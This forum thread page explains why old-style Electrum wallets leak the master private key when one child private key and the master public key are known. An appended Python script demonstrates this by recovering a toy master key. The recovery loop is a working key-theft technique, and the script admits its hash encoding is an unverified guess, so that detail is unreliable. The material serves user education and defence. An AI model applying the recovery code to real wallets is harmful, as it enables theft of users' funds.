Topic: [How Electrum Works] Why you should be careful with your private keys. - page 3. (Read 9303 times)

hero member
Activity: 692
Merit: 500
http://bitcoinmagazine.com/8396/deterministic-wallets-advantages-flaw/

Quote
Vitalik Buterin
7 months ago
> you can get all of the other private keys in the same sequence. That is not a vulnerability, that is the way it is *supposed* to work. In fact, that is the whole point!

No, that is very much a vulnerability. Here's the idea. Suppose I make a root master private key, then hand my master public key to my accountant, and then create three child keys - one for department A, one for department X, and one for myself. Intuitively, this setup should be safe. Department A should not be able to compute the keys of department X or myself, and indeed they can't. Also, the accountant should not be able to get any private keys. However, if the accountant and department X collude, they can steal everything. This is very counterintuitive, and this is very bad.
legendary
Activity: 1302
Merit: 1004
Core dev leaves me neg feedback #abuse #political
Thanks for the explanation.

I've seen you mention this topic many times around here lately, so it's great to finally be able to quantify why this occurs.

I feel like keys simply should never be exported because of this, why would anyone ever want to take this risk?

The only valid reason I can think of would be to do an off-chain transaction. But in that case, it should be the only coins in the Electrum wallet, and therefore, why not simply give someone the seed?
newbie
Activity: 8
Merit: 0
Thanks for the explanation.

I've seen you mention this topic many times around here lately, so it's great to finally be able to quantify why this occurs.

I feel like keys simply should never be exported because of this, why would anyone ever want to take this risk?
legendary
Activity: 1302
Merit: 1004
Core dev leaves me neg feedback #abuse #political
Thanks Debura.

Btw, 10,000 or 100,000?
sr. member
Activity: 475
Merit: 252
Hi all,

In another thread, it seemed that not many people are aware (even though there is a warning message when you export a private key from a seeded address) of the (MPK + privkeyn = Master Private Key (mpk)) quirk.

I'm here to explain it.

First, some clarification.

Your seed is not your Master Private Key. Your seed is "stretched" out 100,000 times by hashing it against itself and subsequent hashes. The final hash that arises from this process is your "Master Private Key" or Extended Private Key. This is the private key to your Master Public Key.

Now that you understand this, here's some basic ECC math:

For a private-public keypair d = private, P = Public, the formula that calculates the public key from the private key is P = dG... where G is the "generator point" on the curve that Bitcoin uses for Elliptic Curve calculations. All keypairs in Bitcoin use the same Generator point G.

This relationship of P = dG is important to understand how the attack takes place.


First let's learn about Electrum's address derivation.

Well, the address derivation formula works something like this:

1. We first create an "s" which is = Hash( n:c:MPK ) where n = the index number of the address (0 = first address, 1 = second address, etc.) and c = Change addresses or not. (1 = change, 0 = regular) and MPK = your master public key.
2. Then we take that hash, use it as a private key against the generator point to get a public key R = sG
3. Then we take the master public key and add it to the sequence public key. This gives us a 3rd public key without needing to know its private key or the master private key, we will call this Pn = dnG

Notice how nowhere in that process did I use the master private key or the private key to Pn.

Now, how do I spend bitcoins for the address at Pn?

1. I stretch the seed 100,000 times to get the Master private key.
2. Since Pn = MPK + R... we can also write the equation as dnG = mpkG + sG.... G cancels out to get dn = mpk + s
3. We add the master private key to the Sequence "s" (and mod by the curve order) to get dn... with this, we can sign for the address at Pn

......

Ok, now that we understand what's going on, how are we vulnerable?

First, what does the attacker need?

1. Your Master Public Key.
2. Any one of the private keys from an individual address derived from your Master Public(/private) Key.

How do they attack you?

I know 100% that your MPK is correct, I know 100% that the private key I obtained is from that MPK's address. Normally people don't use a lot of addresses on Electrum, so even if we don't know the sequence number, we could try about 100 times and most likely find the right sequence.

Here's what I do:
1. I calculate the Bitcoin address from your private key; the public key is X.
2. I attempt to guess. Let's say I get it right that your number was Hash( 0:0:MPK ). Because I know your MPK and I guessed the index of your private key, I now have the sequence secret.
3. I create the public key for the sequence secret and add it to your Master Public Key. If the end result is X, I have correctly found the sequence secret. If not, just keep guessing; it's fast.
4. As we said before, private key derivation is d0 = mpk + s... so we change it around to mpk = s - d0
5. We know the sequence secret now, and the Bitcoin address private key. We subtract the private key from the sequence secret and, modding by the curve order, get the master private key.
6. Just in case, check if MPK = mpk * G. If it does, now you can solve any sequence address's private key.


So everyone, please treat every single individual private key on your seed's wallet as carefully as you would treat your seed.


BIP32 has the same problem; however, it also has something called "hardened keys," which are supposed to break the chain (so you can only derive it one way) but at the expense of utility (you won't be able to derive deeper chains from that child).


That being said, Electrum's offline signing ability and its lightweight client make it my favorite Bitcoin client to date. Just be sure to educate yourself. The same can be said of anything in life, especially Bitcoin-related things, but it always helps to learn.


I hope this helps prevent theft. Please take care of your private keys.

Thank you.
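The derivation and the attack described in the post above, carried through in code as an added example (this is not Electrum's code and not the poster's). It implements the old-style scheme on secp256k1 with plain Python integer arithmetic: the watch-only derivation Pn = MPK + s*G, the signing derivation dn = mpk + s (mod N), and the attacker's loop that, given only the MPK and one leaked child key, guesses (n, c) until (dn - s)*G lands on the MPK, which recovers mpk as the rearrangement of dn = mpk + s. Assumptions: the "stretched seed" is a constructed constant standing in for the 100,000-round hash, and the exact byte encoding of Hash(n:c:MPK) (double SHA-256 over "n:c:" plus the 64-byte uncompressed key) is an approximation of Electrum's original format, not checked against its source; the attack does not depend on that encoding, only on the attacker using the same derivation function as the wallet.

```python
"""Old-style Electrum (pre-BIP32) derivation and master-key recovery from
MPK + one child private key.  Example code, not from Electrum or the post."""
import hashlib

# secp256k1 domain parameters (the curve Bitcoin uses)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def point_add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point=G):
    """Double-and-add scalar multiplication k*point."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def sequence_secret(n, change, mpk_point):
    """s = Hash(n:c:MPK).  The byte layout here (double SHA-256 over "n:c:"
    plus the 64-byte uncompressed MPK) is an ASSUMPTION about the exact
    format; the attack only needs the attacker to use the wallet's function."""
    x, y = mpk_point
    data = f"{n}:{change}:".encode() + x.to_bytes(32, "big") + y.to_bytes(32, "big")
    return int.from_bytes(hashlib.sha256(hashlib.sha256(data).digest()).digest(), "big") % N


def child_pubkey(n, change, mpk_point):
    """Watch-only derivation: Pn = MPK + s*G, no private key needed."""
    return point_add(mpk_point, scalar_mult(sequence_secret(n, change, mpk_point)))


def child_privkey(n, change, master_priv, mpk_point):
    """Signing derivation: dn = mpk + s (mod N)."""
    return (master_priv + sequence_secret(n, change, mpk_point)) % N


def recover_master_privkey(mpk_point, leaked_priv, max_index=100):
    """Attacker: knows MPK and one child private key but not its index.
    Guess (n, c), compute s, and test whether (leaked - s)*G == MPK.
    Returns (mpk, n, c) on success, None if no index below max_index matches."""
    for change in (0, 1):
        for n in range(max_index):
            s = sequence_secret(n, change, mpk_point)
            candidate = (leaked_priv - s) % N          # mpk = dn - s
            if scalar_mult(candidate) == mpk_point:    # check MPK == mpk*G
                return candidate, n, change
    return None


# Constructed toy "stretched seed"; stands in for the 100,000-round hash.
MASTER_PRIV = int.from_bytes(
    hashlib.sha256(b"toy stretched seed, not a real wallet").digest(), "big") % N
MPK = scalar_mult(MASTER_PRIV)


def demo(n=7, change=0):
    """Derive one child both ways, 'leak' its private key, recover the master key."""
    pub_from_mpk = child_pubkey(n, change, MPK)              # what the accountant can compute
    priv = child_privkey(n, change, MASTER_PRIV, MPK)        # what the department holds
    assert scalar_mult(priv) == pub_from_mpk                 # both derivations agree
    recovered, found_n, found_c = recover_master_privkey(MPK, priv)
    return recovered == MASTER_PRIV and (found_n, found_c) == (n, change)


if __name__ == "__main__":
    print("master private key recovered from MPK + one child key:", demo())
```

The loop bound of 100 mirrors the post's "try about 100 times"; each guess costs one scalar multiplication, so even a much larger address gap is cheap for the attacker. The same arithmetic is why an exported child key from this scheme has to be protected exactly like the seed.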